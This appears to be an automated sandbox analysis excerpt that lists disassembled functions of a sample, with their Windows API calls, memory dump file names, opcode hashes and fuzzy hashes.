• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free
• String ID:
• API String ID: 1864747095-0
• Opcode ID: e449bb216ff66633d5b767f342b569030333dd17d27f5dcc4afe241b7d05d303
• Instruction ID: 9785defabbf8682e6c434505199c5211b710d04e266eb5916f03b18b783721c8
• Opcode Fuzzy Hash: e449bb216ff66633d5b767f342b569030333dd17d27f5dcc4afe241b7d05d303
• Instruction Fuzzy Hash: 6FF02473684B128BEB34277D7D0892A2A64AFC07A1701C138F4CED7240FE20C8494774
Uniqueness

Uniqueness Score: -1.00%

APIs
• __freea.LIBCMT ref: 00D9A39B
  • Part of subcall function 00D98247: RtlAllocateHeap.NTDLL(00000000,00000000,00D95FF3,?,00D9A198,?,00000000,?,00D89D85,00000000,00D95FF3,00E8EBCC,?,00E8EBC8,?,00D95DED), ref: 00D98279
• __freea.LIBCMT ref: 00D9A3B0
• __freea.LIBCMT ref: 00D9A3C0
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: __freea$AllocateHeap
• String ID:
• API String ID: 2243444508-0
• Opcode ID: 3ecc39c27af2c73bf049e22deff36ce9d926bb00fad25a529c6a0b897d182924
• Instruction ID: b3833fd0b5ffed3e16cae19192c0c5b3f11c6e5fb45c54452b3232d145d2df94
• Opcode Fuzzy Hash: 3ecc39c27af2c73bf049e22deff36ce9d926bb00fad25a529c6a0b897d182924
• Instruction Fuzzy Hash: A8519F73600216AFEF25AFA9DC81EBB7BA9EF44750B190129FD08D6151EB31CC5087B6
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNEL32(?,?,?,00000000,1FC3D414,?,?), ref: 00CF1F67
• ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 00CF2074
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
• Opcode ID: e3b9ae5fd750b45942531db224bfaa0359a27c8777ceaa6a445b42fe8c96e0af
• Instruction ID: 1cd556b0d6bf2004714cf59e8de2f9e1d229241c726030291eaf8aef968b35c7
• Opcode Fuzzy Hash: e3b9ae5fd750b45942531db224bfaa0359a27c8777ceaa6a445b42fe8c96e0af
• Instruction Fuzzy Hash: 686181B1D00609EFDB04CFA9C945B9DFBB4FF09320F10426AE925A7390DB75AA14CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1FC3D414,?,00000000,?,80004005,?,00000000), ref: 00CEF35E
• GetLastError.KERNEL32 ref: 00CEF396
• GetLastError.KERNEL32(?), ref: 00CEF42F
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorLast$CreateFile
• String ID:
• API String ID: 1722934493-0
• Opcode ID: a70f89bb600c78879f1079ebfdb3035e8e7a45e472ff05d5353fc3fd5cc099b5
• Instruction ID: 1cfbf1ce09ec0acbdb549d18732e39cdc6809da42d02f0f983f2930c67075ed9
• Opcode Fuzzy Hash: a70f89bb600c78879f1079ebfdb3035e8e7a45e472ff05d5353fc3fd5cc099b5
• Instruction Fuzzy Hash: BE51E471A00A469FDB10DF69C845BAAF7F1FF44320F10866EE569973E0EB31A905CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 00CEE389
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DED0D0,000000FF), ref: 00CEE398
• IsWindow.USER32(?), ref: 00CEE3C5
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CurrentDestroyThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2303547079-0
                                                                                                                                                                        • Opcode ID: 85c7854313a30dd90683c1b57bafdbd6e4e02b717bf030be8fe8b41e630f4bce
                                                                                                                                                                        • Instruction ID: 81f0c110e909ae7924b9a24bf10a0646ebea37ec424156249140c204fdccecac
                                                                                                                                                                        • Opcode Fuzzy Hash: 85c7854313a30dd90683c1b57bafdbd6e4e02b717bf030be8fe8b41e630f4bce
                                                                                                                                                                        • Instruction Fuzzy Hash: DAF082711157909FE3709B2AEE08B46BBD56B48B00F05190EE0D6A6AA0D7B5F848CB24
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00D8B55D,?,00D850F2,?,?,1FC3D414,00D850F2,?), ref: 00D8B574
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00D8B55D,?,00D850F2,?,?,1FC3D414,00D850F2,?), ref: 00D8B57B
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00D8B58D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                        • Opcode ID: 5ff3d518859ff2c95e06178ef614734ee6c679202a95f8549b3ac7bdaa428029
                                                                                                                                                                        • Instruction ID: f613dfaeccbe4a010ef29f7a9319aecb5465e2776502f22ce4c13d438e981a63
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ff3d518859ff2c95e06178ef614734ee6c679202a95f8549b3ac7bdaa428029
                                                                                                                                                                        • Instruction Fuzzy Hash: DBD09E31000944AFDF413FA2DD0D85E3F26EF44361B444161B94555131DF72999ADB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000000,1FC3D414), ref: 00CCD500
                                                                                                                                                                          • Part of subcall function 00CCD5C0: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,?,?,?,80004005), ref: 00CCD5CD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer$EnvironmentFolderHeapPathProcessSpecialVariable
                                                                                                                                                                        • String ID: USERPROFILE
                                                                                                                                                                        • API String ID: 1777821646-2419442777
                                                                                                                                                                        • Opcode ID: feced6b733091b4cb1b7bf0a21621ffc2c1b27b0107a6cbeb3788fcf72a8455d
                                                                                                                                                                        • Instruction ID: 269e5a3c8a23d650bfb79b67deeb0eeaea37842100f562f115f710372de3857c
                                                                                                                                                                        • Opcode Fuzzy Hash: feced6b733091b4cb1b7bf0a21621ffc2c1b27b0107a6cbeb3788fcf72a8455d
                                                                                                                                                                        • Instruction Fuzzy Hash: F561CFB1A006099FDB14DF68CC59BAEB7F4FF44314F14866DE826DB291DB70AA04CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FlsAlloc.KERNEL32(?,00D81BB6,00D81AB9,00D83D4F), ref: 00D84C85
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Alloc
                                                                                                                                                                        • String ID: FlsAlloc
                                                                                                                                                                        • API String ID: 2773662609-671089009
                                                                                                                                                                        • Opcode ID: 62b4d0595288372c41183735cb468d0717df87bf83512d8da0a9eaee013d6dae
                                                                                                                                                                        • Instruction ID: 6de6daff386df8dd6e57b57df41988ca4837239416b2e13bdc25f1f12dda3f5d
                                                                                                                                                                        • Opcode Fuzzy Hash: 62b4d0595288372c41183735cb468d0717df87bf83512d8da0a9eaee013d6dae
                                                                                                                                                                        • Instruction Fuzzy Hash: 9ED02B3178172567C6007AA1ED02BBB7F8CC700FB2F040161FD88711E799634C9147D8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D7C943
                                                                                                                                                                          • Part of subcall function 00D7D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00D7D448
                                                                                                                                                                          • Part of subcall function 00D7D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7D4B0
                                                                                                                                                                          • Part of subcall function 00D7D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7D4C1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                                                                                                                        • String ID: u
                                                                                                                                                                        • API String ID: 697777088-791765612
                                                                                                                                                                        • Opcode ID: 5df8c5e94b9fe545b2483a8586ab13f427a0510fa2e674472841b7761e3137ec
                                                                                                                                                                        • Instruction ID: c8b7ffb467c82b0f21dcc57809f3e4df3d1c1c9b1918b495654ab3719c557c3a
                                                                                                                                                                        • Opcode Fuzzy Hash: 5df8c5e94b9fe545b2483a8586ab13f427a0510fa2e674472841b7761e3137ec
                                                                                                                                                                        • Instruction Fuzzy Hash: 20B012C237E1046D3A84625DAC03C36125CC5C0B11330E12FF44CE0040F6505C041971
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00D9FACA: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00D9FAF5
                                                                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00D9FDE1,?,00000000,?,?,?), ref: 00D9FFFE
                                                                                                                                                                        • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D9FDE1,?,00000000,?,?,?), ref: 00DA0040
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID:
• API String ID: 546120528-0
• Opcode ID: 414048799db6f73ff3d657e3ea78d0598679f2daa290b4bba34e249bfc44abe9
• Instruction ID: fc91b720aa9b74d014eaecd528a4af3bdd72bed848330090d9ae6b783fb512c1
• Opcode Fuzzy Hash: 414048799db6f73ff3d657e3ea78d0598679f2daa290b4bba34e249bfc44abe9
• Instruction Fuzzy Hash: 41510070A007459EDB20CF75C881BAABFF4EF46304F18856EE096C7251D675994ACB70
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00CEDAE1), ref: 00CEE180
• DestroyWindow.USER32(00000000,?,00000000), ref: 00CEE237
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: DestroyErrorLastWindow
• String ID:
• API String ID: 1182162058-0
• Opcode ID: f0ad9c29c52e60bb7efda88129449167d487413559162090f97bde00d75880e2
• Instruction ID: 5d2a9e29958da36038f2a981cbb0e31f624763d618f989480d2932c281f6755d
• Opcode Fuzzy Hash: f0ad9c29c52e60bb7efda88129449167d487413559162090f97bde00d75880e2
• Instruction Fuzzy Hash: 5B21E4716101499BDB20AF19EC02BEA7798EB54320F000267FD14C7792D776EDA8DBE2
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00CCFF30: LoadLibraryW.KERNEL32(ComCtl32.dll,1FC3D414,?,00000000,00000000), ref: 00CCFF6E
  • Part of subcall function 00CCFF30: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00CCFF91
  • Part of subcall function 00CCFF30: FreeLibrary.KERNEL32(00000000), ref: 00CD000F
• SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00CD0964
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CD096F
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: LibraryMessageSend$AddressFreeLoadProc
• String ID:
• API String ID: 3032493519-0
• Opcode ID: 4dd297c40533c3fbd3d6740645c116ca22431af9960af410c084cdf941ca13ef
• Instruction ID: e8ad01b1df486c6453704f8356be4acea2aa8979a9e393778cdf04a826b812f9
• Opcode Fuzzy Hash: 4dd297c40533c3fbd3d6740645c116ca22431af9960af410c084cdf941ca13ef
• Instruction Fuzzy Hash: 8DF0A03179521837F660219A5C43F27B68DD781B68F10427AFA88AB2C2ECD27C0A02D8
Uniqueness
Uniqueness Score: -1.00%

APIs
• LCMapStringEx.KERNEL32(?,00D9A2DA,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00D99F8C
• LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00D9A2DA,?,?,00000000,?,00000000), ref: 00D99FAA
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: String
• String ID:
• API String ID: 2568140703-0
• Opcode ID: ffa9342a4f02a6ff64209a6ce799bc0dc7c362ac47793de377cd9c4105838b66
• Instruction ID: 93738023e28910be8ff9e5c7f8e201bebc3b2bed10653429a141e4d7c6e6a302
• Opcode Fuzzy Hash: ffa9342a4f02a6ff64209a6ce799bc0dc7c362ac47793de377cd9c4105838b66
• Instruction Fuzzy Hash: 29F0683240411ABBCF125F95DC159DEBE26EF48360B094114BA5865034CA36D871ABA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlFreeHeap.NTDLL(00000000,00000000,?,00DA1120,?,00000000,?,?,00DA13C1,?,00000007,?,?,00DA1813,?,?), ref: 00D98223
• GetLastError.KERNEL32(?,?,00DA1120,?,00000000,?,?,00DA13C1,?,00000007,?,?,00DA1813,?,?), ref: 00D9822E
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: eeb1d7fbd2cbfea53f2573623d2cb1ef18178e09be1c6ad46ddbe977aec3b883
• Instruction ID: 7825d185d4ead13898e53e81d0f9eaed626d874e73e10c4de4fef6824d412897
• Opcode Fuzzy Hash: eeb1d7fbd2cbfea53f2573623d2cb1ef18178e09be1c6ad46ddbe977aec3b883
• Instruction Fuzzy Hash: 52E08C32100A14AFDF113BB6FE0CBA93A98EB42791F144021F608A60B0DF31989497B8
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00D84C57: FlsAlloc.KERNEL32(?,00D81BB6,00D81AB9,00D83D4F), ref: 00D84C85
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D81BCA
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D81BD5
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: AllocValue___vcrt____vcrt_uninitialize_ptd
• String ID:
• API String ID: 1208342256-0
• Opcode ID: 5c7c39d293539027b5ec86b5f17bca194a250cc69877389a1dd5ecade7d1213a
• Instruction ID: 3a8da5f8d32ec65b8961177d86b19837ee373990b54d7f1b6133dc3a8b8f5e7b
• Opcode Fuzzy Hash: 5c7c39d293539027b5ec86b5f17bca194a250cc69877389a1dd5ecade7d1213a
• Instruction Fuzzy Hash: D7D0A9AC009302288C0833B2280289A238CE9037B47A0064AE020A61D2FE24A84FA332
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(?,?), ref: 00D7F85E
• RtlEncodePointer.NTDLL(00000000,?,00D7F7E8,00000000,AtlThunk_AllocateData,00E97D78,?,00D7FB44,00E97D7C,?,00000000,?,00CF5F5C,?,00000000,00000000), ref: 00D7F86D
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: AddressEncodePointerProc
• String ID:
• API String ID: 1846120836-0
• Opcode ID: 763b1ef7a8a07eaf46d16c86a0ebef19c8532e62ded5001e2e1dd1d234e8ab95
• Instruction ID: 14dbf2c4de208b45ec8f703b2e466312a8d1e47024a480d4786ac5fa66eb1cf2
                                                                                                                                                                        • Opcode Fuzzy Hash: 763b1ef7a8a07eaf46d16c86a0ebef19c8532e62ded5001e2e1dd1d234e8ab95
                                                                                                                                                                        • Instruction Fuzzy Hash: 17D092B5140308AFDF115FA6EC0899A3BA9BB5A7557009064F81D86621EB3398A6AA60
